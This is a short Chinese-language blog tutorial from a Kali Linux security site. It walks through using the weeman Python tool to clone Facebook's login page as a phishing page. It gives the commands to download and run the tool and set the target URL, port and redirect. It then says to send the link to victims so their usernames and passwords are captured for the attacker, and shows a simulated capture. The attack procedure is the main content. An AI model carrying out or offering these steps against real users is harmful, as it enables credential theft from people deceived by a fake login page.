最新消息:

网页钓鱼之weeman使用

Kali Linux Eternal 3758浏览 0评论

weeman是一个由Python编写的脚本。它可以创建一个钓鱼页面,来窃取用户的信息。下面我们来看看,如何使用该脚本。

首先,让我们从github上进行下载。

github clone https://github.com/Hypsurus/weeman

20160511141618

下载成功后,我们进入该目录。

cd /root/Desktop/weeman

并在该目录执行 weeman 。

./weeman.py

20160511141643

下面让我们利用该工具的 show 命令,来查看我们需要做哪些配置。我们以Facebook为例。

show

设置我们需要克隆的网址页面。

set url http://www.facebook.com

设置监听访问端口。

set port 8080

设置当目标的用户名及密码,被成功钓鱼后需要跳转到的页面。我们任让他跳到Facebook的主页。

set action_url http://www.facebook.com

执行。

run

20160511141705

成功执行后,它会返回一个克隆的页面和链接。只要将链接发送给受害者,当他点击链接并输入账户信息就会被记录,反弹给攻击者。

20160511143651

下面我模拟受害者点击并输入账户,很快在weeman 的界面获取到了我输入的账户信息。

20160511143748

转载请注明:即刻安全 » 网页钓鱼之weeman使用

您必须 登录 才能发表评论!



合作伙伴